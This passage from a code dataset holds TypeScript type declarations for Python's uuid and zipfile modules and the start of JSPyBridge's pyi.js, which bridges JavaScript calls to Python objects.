Promise<any>\n\t\tclock_seq$($: {}): Promise<any>\n\t\tnode(): Promise<any>\n\t\tnode$($: {}): Promise<any>\n\t\thex(): Promise<any>\n\t\thex$($: {}): Promise<any>\n\t\turn(): Promise<any>\n\t\turn$($: {}): Promise<any>\n\t\tvariant(): Promise<any>\n\t\tvariant$($: {}): Promise<any>\n\t\tversion(): Promise<any>\n\t\tversion$($: {}): Promise<any>\n\t}\n\tlet int_: Promise<any>\n\tlet bytes_: Promise<any>\n\tlet NAMESPACE_DNS: Promise<any>\n\tlet NAMESPACE_URL: Promise<any>\n\tlet NAMESPACE_OID: Promise<any>\n\tlet NAMESPACE_X500: Promise<any>\n}\ndeclare module zipfile {\n\tvar _\n\n\t/**\n\t * Quickly see if a file is a ZIP file by checking the magic number.\n\t * \n\t * The filename argument may be a file or file-like object too.\n\t * \n\t */\n\tfunction is_zipfile(filename): Promise<any>\n\tfunction is_zipfile$({ filename }): Promise<any>\n\tfunction main(args?): Promise<any>\n\tfunction main$({ args }: { args?}): Promise<any>\n\tinterface IBadZipFile {\n\t}\n\n\t/**\n\t * \n\t * Raised when writing a zipfile, the zipfile requires ZIP64 extensions\n\t * and those extensions are disabled.\n\t * \n\t */\n\tinterface ILargeZipFile {\n\t}\n\n\t/**\n\t * Class with attributes describing each file in the ZIP archive.\n\t */\n\tfunction ZipInfo(filename?, date_time?): Promise<IZipInfo>\n\tfunction ZipInfo$({ filename, date_time }: { filename?, date_time?}): Promise<IZipInfo>\n\tinterface IZipInfo {\n\n\t\t/**\n\t\t * Return the per-file header as a bytes object.\n\t\t */\n\t\tFileHeader(zip64?): Promise<any>\n\t\tFileHeader$({ zip64 }: { zip64?}): Promise<any>\n\n\t\t/**\n\t\t * Construct an appropriate ZipInfo for a file on the filesystem.\n\t\t * \n\t\t * filename should be the path to a file or directory on the filesystem.\n\t\t * \n\t\t * arcname is the name which it will have within the archive (by default,\n\t\t * this will be the same as filename, but without a drive letter and with\n\t\t * leading path separators removed).\n\t\t * \n\t\t */\n\t\tfrom_file(filename, arcname?): Promise<any>\n\t\tfrom_file$({ filename, arcname }: { filename, arcname?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if this archive member is a directory.\n\t\t */\n\t\tis_dir(): Promise<any>\n\t\tis_dir$($: {}): Promise<any>\n\t}\n\tfunction LZMACompressor(): Promise<ILZMACompressor>\n\tfunction LZMACompressor$({ }): Promise<ILZMACompressor>\n\tinterface ILZMACompressor {\n\t\tcompress(data): Promise<any>\n\t\tcompress$({ data }): Promise<any>\n\t\tflush(): Promise<any>\n\t\tflush$($: 
{}): Promise<any>\n\t}\n\tfunction LZMADecompressor(): Promise<ILZMADecompressor>\n\tfunction LZMADecompressor$({ }): Promise<ILZMADecompressor>\n\tinterface ILZMADecompressor {\n\t\tdecompress(data): Promise<any>\n\t\tdecompress$({ data }): Promise<any>\n\t}\n\tinterface I_SharedFile {\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tread(n?): Promise<any>\n\t\tread$({ n }: { n?}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tinterface I_Tellable {\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\t\tflush(): Promise<any>\n\t\tflush$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * File-like object for reading an archive member.\n\t * Is returned by ZipFile.open().\n\t * \n\t */\n\tfunction ZipExtFile(fileobj, mode, zipinfo, pwd?, close_fileobj?: boolean): Promise<IZipExtFile>\n\tfunction ZipExtFile$({ fileobj, mode, zipinfo, pwd, close_fileobj }: { fileobj, mode, zipinfo, pwd?, close_fileobj?}): Promise<IZipExtFile>\n\tinterface IZipExtFile {\n\n\t\t/**\n\t\t * Read and return a line from the stream.\n\t\t * \n\t\t * If limit is specified, at most limit bytes will be read.\n\t\t * \n\t\t */\n\t\treadline(limit?): Promise<any>\n\t\treadline$({ limit }: { limit?}): Promise<any>\n\n\t\t/**\n\t\t * Returns buffered bytes without advancing the position.\n\t\t */\n\t\tpeek(n?): Promise<any>\n\t\tpeek$({ n }: { n?}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read and return up to n bytes.\n\t\t * If the argument is omitted, None, or negative, data is read and returned until EOF is reached.\n\t\t * \n\t\t */\n\t\tread(n?): Promise<any>\n\t\tread$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Read up to n bytes with at most one read() system call.\n\t\t */\n\t\tread1(n): Promise<any>\n\t\tread1$({ n }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\t\tMAX_N\n\t\tMIN_READ_SIZE\n\t\tMAX_SEEK_READ\n\t}\n\tinterface I_ZipWriteFile {\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Class with methods to open, read, write, close, list zip files.\n\t * \n\t * z = ZipFile(file, mode=\"r\", compression=ZIP_STORED, allowZip64=True,\n\t * compresslevel=None)\n\t * \n\t * file: Either the path to the file, or a file-like object.\n\t * If it is a path, the file will be opened and closed by ZipFile.\n\t * mode: The mode can be either read 'r', write 'w', exclusive create 'x',\n\t * or append 'a'.\n\t * compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib),\n\t * ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma).\n\t * allowZip64: if True ZipFile will create files with ZIP64 extensions when\n\t * needed, otherwise it will raise an exception when this would\n\t * be necessary.\n\t * compresslevel: None (default for the given compression type) or an integer\n\t * specifying the level to pass to the compressor.\n\t * When using ZIP_STORED or ZIP_LZMA this keyword has no effect.\n\t * When using 
ZIP_DEFLATED integers 0 through 9 are accepted.\n\t * When using ZIP_BZIP2 integers 1 through 9 are accepted.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Open the ZIP file with mode read 'r', write 'w', exclusive create 'x',\n\t * or append 'a'.\n\t */\n\tfunction ZipFile(file, mode?, compression?, allowZip64?: boolean, compresslevel?): Promise<IZipFile>\n\tfunction ZipFile$({ file, mode, compression, allowZip64, compresslevel }: { file, mode?, compression?, allowZip64?, compresslevel?}): Promise<IZipFile>\n\tinterface IZipFile {\n\n\t\t/**\n\t\t * Return a list of file names in the archive.\n\t\t */\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of class ZipInfo instances for files in the\n\t\t * archive.\n\t\t */\n\t\tinfolist(): Promise<any>\n\t\tinfolist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Print a table of contents for the zip file.\n\t\t */\n\t\tprintdir(file?): Promise<any>\n\t\tprintdir$({ file }: { file?}): Promise<any>\n\n\t\t/**\n\t\t * Read all the files and check the CRC.\n\t\t */\n\t\ttestzip(): Promise<any>\n\t\ttestzip$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the instance of ZipInfo given 'name'.\n\t\t */\n\t\tgetinfo(name): Promise<any>\n\t\tgetinfo$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Set default password for encrypted files.\n\t\t */\n\t\tsetpassword(pwd): Promise<any>\n\t\tsetpassword$({ pwd }): Promise<any>\n\n\t\t/**\n\t\t * The comment text associated with the ZIP file.\n\t\t */\n\t\tcomment(): Promise<any>\n\t\tcomment$($: {}): Promise<any>\n\t\tcomment(comment): Promise<any>\n\t\tcomment$({ comment }): Promise<any>\n\n\t\t/**\n\t\t * Return file bytes for name.\n\t\t */\n\t\tread(name, pwd?): Promise<any>\n\t\tread$({ name, pwd }: { name, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Return file-like object for 'name'.\n\t\t * \n\t\t * name is a string for the file name within the ZIP file, or a ZipInfo\n\t\t * object.\n\t\t * \n\t\t * mode should be 'r' to read a file already in the ZIP file, or 'w' to\n\t\t * write to a file newly added to the archive.\n\t\t * \n\t\t * pwd is the password to decrypt files (only used for reading).\n\t\t * \n\t\t * When writing, if the file size is not known in advance but may exceed\n\t\t * 2 GiB, pass force_zip64 to use the ZIP64 format, which can handle large\n\t\t * files. If the size is known in advance, it is best to pass a ZipInfo\n\t\t * instance for name, with zinfo.file_size set.\n\t\t * \n\t\t */\n\t\topen(name, mode?, pwd?): Promise<any>\n\t\topen$({ name, mode, pwd }: { name, mode?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive to the current working directory,\n\t\t * using its full name. Its file information is extracted as accurately\n\t\t * as possible. `member' may be a filename or a ZipInfo object. You can\n\t\t * specify a different directory using `path'.\n\t\t * \n\t\t */\n\t\textract(member, path?, pwd?): Promise<any>\n\t\textract$({ member, path, pwd }: { member, path?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Extract all members from the archive to the current working\n\t\t * directory. 
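/* Sketch: a write-then-read round trip with the ZipFile methods above,
 * using writestr() (documented just below) to add a member from memory
 * (entry-point assumptions as in the earlier sketches).
 *
 *   const zipfile = await python('zipfile')
 *   const zf = await zipfile.ZipFile('demo.zip', 'w')
 *   await zf.writestr('hello.txt', 'hi from JS')   // str payloads are UTF-8 encoded
 *   await zf.close()
 *   const rd = await zipfile.ZipFile('demo.zip')   // mode defaults to 'r'
 *   console.log(await rd.namelist())               // ['hello.txt']
 *   console.log(await rd.read('hello.txt'))        // b'hi from JS'
 *   await rd.close()
 */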
`path' specifies a different directory to extract to.\n\t\t * `members' is optional and must be a subset of the list returned\n\t\t * by namelist().\n\t\t * \n\t\t */\n\t\textractall(path?, members?, pwd?): Promise<any>\n\t\textractall$({ path, members, pwd }: { path?, members?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Put the bytes from filename into the archive under the name\n\t\t * arcname.\n\t\t */\n\t\twrite(filename, arcname?, compress_type?, compresslevel?): Promise<any>\n\t\twrite$({ filename, arcname, compress_type, compresslevel }: { filename, arcname?, compress_type?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Write a file into the archive. The contents is 'data', which\n\t\t * may be either a 'str' or a 'bytes' instance; if it is a 'str',\n\t\t * it is encoded as UTF-8 first.\n\t\t * 'zinfo_or_arcname' is either a ZipInfo instance or\n\t\t * the name of the file in the archive.\n\t\t */\n\t\twritestr(zinfo_or_arcname, data, compress_type?, compresslevel?): Promise<any>\n\t\twritestr$({ zinfo_or_arcname, data, compress_type, compresslevel }: { zinfo_or_arcname, data, compress_type?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Close the file, and for mode 'w', 'x' and 'a' write the ending\n\t\t * records.\n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tfp\n\t}\n\n\t/**\n\t * Class to create ZIP archives with Python library files and packages.\n\t */\n\tfunction PyZipFile(file, mode?, compression?, allowZip64?: boolean, optimize?): Promise<IPyZipFile>\n\tfunction PyZipFile$({ file, mode, compression, allowZip64, optimize }: { file, mode?, compression?, allowZip64?, optimize?}): Promise<IPyZipFile>\n\tinterface IPyZipFile extends IZipFile {\n\n\t\t/**\n\t\t * Add all files from \"pathname\" to the ZIP archive.\n\t\t * \n\t\t * If pathname is a package directory, search the directory and\n\t\t * all package subdirectories recursively for all *.py and enter\n\t\t * the modules into the archive. If pathname is a plain\n\t\t * directory, listdir *.py and enter all modules. Else, pathname\n\t\t * must be a Python *.py file and the module will be put into the\n\t\t * archive. 
Added modules are always module.pyc.\n\t\t * This method will compile the module.py into module.pyc if\n\t\t * necessary.\n\t\t * If filterfunc(pathname) is given, it is called with every argument.\n\t\t * When it is False, the file or directory is skipped.\n\t\t * \n\t\t */\n\t\twritepy(pathname, basename?, filterfunc?): Promise<any>\n\t\twritepy$({ pathname, basename, filterfunc }: { pathname, basename?, filterfunc?}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A ZipFile subclass that ensures that implied directories\n\t * are always included in the namelist.\n\t * \n\t */\n\tinterface ICompleteDirs extends IZipFile {\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * If the name represents a directory, return that name\n\t\t * as a directory (with the trailing slash).\n\t\t * \n\t\t */\n\t\tresolve_dir(name): Promise<any>\n\t\tresolve_dir$({ name }): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Given a source (filename or zipfile), return an\n\t\t * appropriate CompleteDirs subclass.\n\t\t * \n\t\t */\n\t\tmake(source): Promise<any>\n\t\tmake$({ source }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * ZipFile subclass to ensure implicit\n\t * dirs exist and are resolved rapidly.\n\t * \n\t */\n\tinterface IFastLookup extends ICompleteDirs {\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A pathlib-compatible interface for zip files.\n\t * \n\t * Consider a zip file with this structure::\n\t * \n\t * .\n\t * ├── a.txt\n\t * └── b\n\t * ├── c.txt\n\t * └── d\n\t * └── e.txt\n\t * \n\t * >>> data = io.BytesIO()\n\t * >>> zf = ZipFile(data, 'w')\n\t * >>> zf.writestr('a.txt', 'content of a')\n\t * >>> zf.writestr('b/c.txt', 'content of c')\n\t * >>> zf.writestr('b/d/e.txt', 'content of e')\n\t * >>> zf.filename = 'mem/abcde.zip'\n\t * \n\t * Path accepts the zipfile object itself or a filename\n\t * \n\t * >>> root = Path(zf)\n\t * \n\t * From there, several path operations are available.\n\t * \n\t * Directory iteration (including the zip file itself):\n\t * \n\t * >>> a, b = root.iterdir()\n\t * >>> a\n\t * Path('mem/abcde.zip', 'a.txt')\n\t * >>> b\n\t * Path('mem/abcde.zip', 'b/')\n\t * \n\t * name property:\n\t * \n\t * >>> b.name\n\t * 'b'\n\t * \n\t * join with divide operator:\n\t * \n\t * >>> c = b / 'c.txt'\n\t * >>> c\n\t * Path('mem/abcde.zip', 'b/c.txt')\n\t * >>> c.name\n\t * 'c.txt'\n\t * \n\t * Read text:\n\t * \n\t * >>> c.read_text()\n\t * 'content of c'\n\t * \n\t * existence:\n\t * \n\t * >>> c.exists()\n\t * True\n\t * >>> (b / 'missing.txt').exists()\n\t * False\n\t * \n\t * Coercion to string:\n\t * \n\t * >>> import os\n\t * >>> str(c).replace(os.sep, posixpath.sep)\n\t * 'mem/abcde.zip/b/c.txt'\n\t * \n\t * At the root, ``name``, ``filename``, and ``parent``\n\t * resolve to the zipfile. Note these attributes are not\n\t * valid and will raise a ``ValueError`` if the zipfile\n\t * has no filename.\n\t * \n\t * >>> root.name\n\t * 'abcde.zip'\n\t * >>> str(root.filename).replace(os.sep, posixpath.sep)\n\t * 'mem/abcde.zip'\n\t * >>> str(root.parent)\n\t * 'mem'\n\t * \n\t */\n\n\t/**\n\t * \n\t * Construct a Path from a ZipFile or filename.\n\t * \n\t * Note: When the source is an existing ZipFile object,\n\t * its type (__class__) will be mutated to a\n\t * specialized type. 
If the caller wishes to retain the\n\t * original type, the caller should either create a\n\t * separate ZipFile object or pass a filename.\n\t * \n\t */\n\tfunction Path(root, at?): Promise<IPath>\n\tfunction Path$({ root, at }: { root, at?}): Promise<IPath>\n\tinterface IPath {\n\n\t\t/**\n\t\t * \n\t\t * Open this entry as text or binary following the semantics\n\t\t * of ``pathlib.Path.open()`` by passing arguments through\n\t\t * to io.TextIOWrapper().\n\t\t * \n\t\t */\n\t\topen(mode?): Promise<any>\n\t\topen$({ mode }: { mode?}): Promise<any>\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tsuffix(): Promise<any>\n\t\tsuffix$($: {}): Promise<any>\n\t\tsuffixes(): Promise<any>\n\t\tsuffixes$($: {}): Promise<any>\n\t\tstem(): Promise<any>\n\t\tstem$($: {}): Promise<any>\n\t\tfilename(): Promise<any>\n\t\tfilename$($: {}): Promise<any>\n\t\tread_text(): Promise<any>\n\t\tread_text$($: {}): Promise<any>\n\t\tread_bytes(): Promise<any>\n\t\tread_bytes$($: {}): Promise<any>\n\t\tis_dir(): Promise<any>\n\t\tis_dir$($: {}): Promise<any>\n\t\tis_file(): Promise<any>\n\t\tis_file$($: {}): Promise<any>\n\t\texists(): Promise<any>\n\t\texists$($: {}): Promise<any>\n\t\titerdir(): Promise<any>\n\t\titerdir$($: {}): Promise<any>\n\t\tjoinpath(): Promise<any>\n\t\tjoinpath$($: {}): Promise<any>\n\t\tparent(): Promise<any>\n\t\tparent$($: {}): Promise<any>\n\t}\n\tlet crc32: Promise<any>\n\tlet error: Promise<any>\n\tlet BadZipfile: Promise<any>\n\tlet ZIP64_LIMIT: Promise<any>\n\tlet ZIP_FILECOUNT_LIMIT: Promise<any>\n\tlet ZIP_MAX_COMMENT: Promise<any>\n\tlet ZIP_STORED: Promise<any>\n\tlet ZIP_DEFLATED: Promise<any>\n\tlet ZIP_BZIP2: Promise<any>\n\tlet ZIP_LZMA: Promise<any>\n\tlet DEFAULT_VERSION: Promise<any>\n\tlet ZIP64_VERSION: Promise<any>\n\tlet BZIP2_VERSION: Promise<any>\n\tlet LZMA_VERSION: Promise<any>\n\tlet MAX_EXTRACT_VERSION: Promise<any>\n\tlet structEndArchive: Promise<any>\n\tlet stringEndArchive: Promise<any>\n\tlet sizeEndCentDir: Promise<any>\n\tlet structCentralDir: Promise<any>\n\tlet stringCentralDir: Promise<any>\n\tlet sizeCentralDir: Promise<any>\n\tlet structFileHeader: Promise<any>\n\tlet stringFileHeader: Promise<any>\n\tlet sizeFileHeader: Promise<any>\n\tlet structEndArchive64Locator: Promise<any>\n\tlet stringEndArchive64Locator: Promise<any>\n\tlet sizeEndCentDir64Locator: Promise<any>\n\tlet structEndArchive64: Promise<any>\n\tlet stringEndArchive64: Promise<any>\n\tlet sizeEndCentDir64: Promise<any>\n\tlet compressor_names: Promise<any>\n}\ntype PyObjectType<T> =\n\tT extends \"astexport\" ? typeof astexport :\n\tT extends \"base64\" ? typeof base64 :\n\tT extends \"codecs\" ? typeof codecs :\n\tT extends \"colorsys\" ? typeof colorsys :\n\tT extends \"crypt\" ? typeof crypt :\n\tT extends \"decimal\" ? typeof decimal :\n\tT extends \"email.base64mime\" ? typeof email.base64mime :\n\tT extends \"encodings.base64_codec\" ? typeof encodings.base64_codec :\n\tT extends \"encodings.bz2_codec\" ? typeof encodings.bz2_codec :\n\tT extends \"encodings.hex_codec\" ? typeof encodings.hex_codec :\n\tT extends \"encodings.palmos\" ? typeof encodings.palmos :\n\tT extends \"encodings.quopri_codec\" ? typeof encodings.quopri_codec :\n\tT extends \"encodings.uu_codec\" ? typeof encodings.uu_codec :\n\tT extends \"encodings.zlib_codec\" ? typeof encodings.zlib_codec :\n\tT extends \"export\" ? typeof export :\n\tT extends \"gzip\" ? typeof gzip :\n\tT extends \"hashlib\" ? typeof hashlib :\n\tT extends \"idlelib.codecontext\" ? 
typeof idlelib.codecontext :\n\tT extends \"idlelib.statusbar\" ? typeof idlelib.statusbar :\n\tT extends \"os\" ? typeof os :\n\tT extends \"platform\" ? typeof platform :\n\tT extends \"pstats\" ? typeof pstats :\n\tT extends \"signal\" ? typeof signal :\n\tT extends \"socket\" ? typeof socket :\n\tT extends \"socketserver\" ? typeof socketserver :\n\tT extends \"sqlite3.dbapi2\" ? typeof sqlite3.dbapi2 :\n\tT extends \"sqlite3.dump\" ? typeof sqlite3.dump :\n\tT extends \"stat\" ? typeof stat :\n\tT extends \"statistics\" ? typeof statistics :\n\tT extends \"tarfile\" ? typeof tarfile :\n\tT extends \"threading\" ? typeof threading :\n\tT extends \"tkinter.colorchooser\" ? typeof tkinter.colorchooser :\n\tT extends \"tkinter.commondialog\" ? typeof tkinter.commondialog :\n\tT extends \"tkinter.constants\" ? typeof tkinter.constants :\n\tT extends \"tkinter.dialog\" ? typeof tkinter.dialog :\n\tT extends \"tkinter.dnd\" ? typeof tkinter.dnd :\n\tT extends \"tkinter.filedialog\" ? typeof tkinter.filedialog :\n\tT extends \"tkinter.font\" ? typeof tkinter.font :\n\tT extends \"tkinter.messagebox\" ? typeof tkinter.messagebox :\n\tT extends \"tkinter.scrolledtext\" ? typeof tkinter.scrolledtext :\n\tT extends \"tkinter.simpledialog\" ? typeof tkinter.simpledialog :\n\tT extends \"tkinter.tix\" ? typeof tkinter.tix :\n\tT extends \"tkinter.ttk\" ? typeof tkinter.ttk :\n\tT extends \"turtledemo.chaos\" ? typeof turtledemo.chaos :\n\tT extends \"uuid\" ? typeof uuid :\n\tT extends \"zipfile\" ? typeof zipfile :\n\tT extends \"sqlite3\" ? typeof sqlite3 :\n\tT extends \"tkinter\" ? typeof tkinter : object;\ntype PyTypeName =\n\t\"astexport\" | \"base64\" | \"codecs\" | \"colorsys\" | \"crypt\" | \"decimal\" | \"email.base64mime\" | \"encodings.base64_codec\" | \"encodings.bz2_codec\" | \"encodings.hex_codec\" | \"encodings.palmos\" | \"encodings.quopri_codec\" | \"encodings.uu_codec\" | \"encodings.zlib_codec\" | \"export\" | \"gzip\" | \"hashlib\" | \"idlelib.codecontext\" | \"idlelib.statusbar\" | \"os\" | \"platform\" | \"pstats\" | \"signal\" | \"socket\" | \"socketserver\" | \"sqlite3.dbapi2\" | \"sqlite3.dump\" | \"stat\" | \"statistics\" | \"tarfile\" | \"threading\" | \"tkinter.colorchooser\" | \"tkinter.commondialog\" | \"tkinter.constants\" | \"tkinter.dialog\" | \"tkinter.dnd\" | \"tkinter.filedialog\" | \"tkinter.font\" | \"tkinter.messagebox\" | \"tkinter.scrolledtext\" | \"tkinter.simpledialog\" | \"tkinter.tix\" | \"tkinter.ttk\" | \"turtledemo.chaos\" | \"uuid\" | \"zipfile\" | \"sqlite3\" | \"tkinter\";" }, { "alpha_fraction": 0.5750069618225098, "alphanum_fraction": 0.5776143074035645, "avg_line_length": 32.98417663574219, "blob_id": "4694d71c325df7be70ec4ae6371b20216821ede9", "content_id": "709f98c24f5a436c7dee7b3a5098e61591b73463", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10739, "license_type": "permissive", "max_line_length": 139, "num_lines": 316, "path": "/src/javascript/js/pyi.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * The Python Interface for JavaScript\n */\n\nconst util = require('util')\nif (typeof performance === 'undefined') var { performance } = require('perf_hooks')\nconst log = () => { }\nconst errors = require('./errors')\nconst REQ_TIMEOUT = 100000\n\nclass BridgeException extends Error {\n constructor (...a) {\n super(...a)\n this.message += ` Python didn't respond in time (${REQ_TIMEOUT}ms), look above for any Python errors. 
If no errors, the API call hung.`\n // We'll fix the stack trace once this is shipped.\n }\n}\n\nclass PythonException extends Error {\n constructor (stack, error) {\n super()\n const failedCall = stack.join('.')\n const trace = this.stack.split('\\n').slice(1).join('\\n')\n\n // Stack is generated at runtime when (and if) the error is printed\n Object.defineProperty(this, 'stack', {\n get: () => errors.getErrorMessage(failedCall, trace, error || this.pytrace)\n })\n }\n\n setPythonTrace (value) {\n // When the exception is thrown, we don't want this to be printed out.\n // We could also use new class \"hard-privates\"\n Object.defineProperty(this, 'pytrace', { enumerable: false, value })\n }\n}\n\nasync function waitFor (cb, withTimeout, onTimeout) {\n let t\n if (withTimeout === Infinity) return new Promise(resolve => cb(resolve))\n const ret = await Promise.race([\n new Promise(resolve => cb(resolve)),\n new Promise(resolve => { t = setTimeout(() => resolve('timeout'), withTimeout) })\n ])\n clearTimeout(t)\n if (ret === 'timeout') onTimeout()\n return ret\n}\n\nlet nextReqId = 10000\nconst nextReq = () => nextReqId++\n\nclass PyBridge {\n constructor (com, jsi) {\n this.com = com\n // This is a ref map used so Python can call back JS APIs\n this.jrefs = {}\n this.jsi = jsi\n\n // We don't want to GC things individually, so batch all the GCs at once\n // to Python\n this.freeable = []\n this.loop = setInterval(this.runTasks, 1000)\n\n // This is called on GC\n this.finalizer = new FinalizationRegistry(ffid => {\n this.freeable.push(ffid)\n // Once the Proxy is freed, we also want to release the pyClass ref\n delete this.jsi.m[ffid]\n })\n\n globalThis.JSPyBridge = {\n python: this.makePyObject(0).python\n }\n }\n\n runTasks = () => {\n if (this.freeable.length) this.free(this.freeable)\n this.freeable = []\n }\n\n end () {\n clearInterval(this.loop)\n }\n\n request (req, cb) {\n // When we call Python functions with Proxy paramaters, we need to just send the FFID\n // so it can be mapped on the python side.\n req.c = 'pyi'\n this.com.write(req, cb)\n }\n\n async len (ffid, stack) {\n const req = { r: nextReq(), action: 'length', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async get (ffid, stack, args, suppressErrors) {\n const req = { r: nextReq(), action: 'get', ffid: ffid, key: stack, val: args }\n\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n if (suppressErrors) return undefined\n throw new PythonException(stack, resp.sig)\n }\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n // This does a function call to Python. We assign the FFIDs, so we can assign them and send the call to Python.\n // We also need to keep track of the Python objects so we can GC them.\n async call (ffid, stack, args, kwargs, set, timeout) {\n const r = nextReq()\n const req = { r, c: 'pyi', action: set ? 
'setval' : 'pcall', ffid: ffid, key: stack, val: [args, kwargs] }\n const payload = JSON.stringify(req, (k, v) => {\n if (!k) return v\n if (v && !v.r) {\n if (v.ffid) return { ffid: v.ffid }\n if (\n typeof v === 'function' ||\n (typeof v === 'object' && (v.constructor.name !== 'Object' && v.constructor.name !== 'Array'))\n ) {\n const ffid = ++this.jsi.ffid\n this.jsi.m[ffid] = v\n this.queueForCollection(ffid, v)\n return { ffid }\n }\n }\n return v\n })\n\n const stacktrace = new PythonException(stack)\n\n const resp = await waitFor(resolve => this.com.writeRaw(payload, r, resolve), timeout || REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n stacktrace.setPythonTrace(resp.sig)\n throw stacktrace\n }\n\n if (set) {\n return true // Do not allocate new FFID if setting\n }\n\n log('call', ffid, stack, args, resp)\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async value (ffid, stack) {\n const req = { r: nextReq(), action: 'value', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async inspect (ffid, stack) {\n const req = { r: nextReq(), action: 'inspect', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async free (ffids) {\n const req = { r: nextReq(), action: 'free', ffid: '', key: '', val: ffids }\n this.request(req)\n return true\n }\n\n queueForCollection (ffid, val) {\n this.finalizer.register(val, ffid)\n }\n\n makePyObject (ffid, inspectString) {\n const self = this\n // \"Intermediate\" objects are returned while chaining. If the user tries to log\n // an Intermediate then we know they forgot to use await, as if they were to use\n // await, then() would be implicitly called where we wouldn't return a Proxy, but\n // a Promise. 
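The custom inspect hint below warns about exactly that. 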
Must extend Function to be a \"callable\" object in JS for the Proxy.\n class Intermediate extends Function {\n constructor (callstack) {\n super()\n this.callstack = [...callstack]\n }\n\n [util.inspect.custom] () {\n return '\\n[You must use await when calling a Python API]\\n'\n }\n }\n const handler = {\n get: (target, prop, reciever) => {\n const next = new Intermediate(target.callstack)\n // log('```prop', next.callstack, prop)\n if (prop === '$$') return target\n if (prop === 'ffid') return ffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'toString' && inspectString) return target[prop]\n if (prop === 'then') {\n // Avoid .then loops\n if (!next.callstack.length) {\n return undefined\n }\n return (resolve, reject) => {\n this.get(ffid, next.callstack, []).then(resolve).catch(reject)\n next.callstack = [] // Empty the callstack afer running fn\n }\n }\n if (prop === 'length') return this.len(ffid, next.callstack, [])\n if (typeof prop === 'symbol') {\n if (prop === Symbol.iterator) {\n // This is just for destructuring arrays\n return function *iter () {\n for (let i = 0; i < 100; i++) {\n const next = new Intermediate([...target.callstack, i])\n yield new Proxy(next, handler)\n }\n throw SyntaxError('You must use `for await` when iterating over a Python object in a for-of loop')\n }\n }\n if (prop === Symbol.asyncIterator) {\n return async function *iter () {\n const it = await self.call(0, ['Iterate'], [{ ffid }])\n while (true) {\n const val = await it.Next()\n if (val === '$$STOPITER') {\n return\n } else {\n yield val\n }\n }\n }\n }\n log('Get symbol', next.callstack, prop)\n return\n }\n if 